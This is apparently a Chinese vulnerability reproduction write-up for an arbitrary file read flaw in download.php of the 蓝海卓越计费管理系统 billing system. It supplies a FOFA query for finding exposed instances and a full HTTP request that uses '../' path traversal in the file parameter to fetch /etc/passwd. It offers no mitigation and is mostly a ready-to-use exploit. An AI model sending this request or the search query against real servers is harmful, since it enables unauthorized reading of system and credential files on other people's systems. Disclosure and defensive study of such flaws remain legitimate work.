0x01、漏洞描述
蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞,攻击者通过 …/ 遍历目录可以读取服务器上的敏感文件
0x02、漏洞影响
蓝海卓越计费管理系统
0x03、fofa
title==“蓝海卓越计费管理系统”
0x04、漏洞复现
登录页面如下:
出现漏洞的文件为 download.php ,其中 file参数 存在用户可控
发送如下请求包:
GET /download.php?file=../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x:x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=vqsud5ae8gnjdisv4uc81nhb30
Upgrade-Insecure-Requests: 1